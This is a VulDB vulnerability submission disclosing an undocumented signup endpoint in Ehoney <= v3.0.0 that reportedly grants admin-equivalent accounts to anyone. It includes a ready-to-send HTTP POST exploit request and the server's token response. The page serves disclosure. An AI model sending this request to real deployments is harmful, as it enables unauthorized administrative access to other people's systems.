Submit #49967: Ehoney <= v3.0.0 unpublished signup api via /api/public/signupinfo

TitelEhoney <= v3.0.0 unpublished signup api via /api/public/signup
Beschreibung## description In Ehoney<=v3.0.0, there is an unpublished registered route. Any user can register an account through this api and log in. Since there is no permission division, this user has the same management permission as admin. ## request POST /api/public/signup HTTP/1.1 Content-Length: 40 Content-Type: application/json Host: x.x.x.x:8080 { "username": "a", "password": "a" } ## response { "code": 200, "msg": "ok", "data": { "name": "a", "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ.GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo" } } ## affected code https://github.com/seccome/Ehoney/blob/aba3197bd2fe9f16e9cf4e20c1a7df4a1608c5a7/controllers/user_handler/uesr.go#L51
Benutzer
 Anonymous User
Einreichung28.10.2022 03:54 (vor 3 Jahren)
Moderieren28.10.2022 07:42 (4 hours later)
StatusAkzeptiert
VulDB Eintrag212417 [seccome Ehoney /api/public/signup erweiterte Rechte]
Punkte17

ZurückÜbersichtWeiter

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!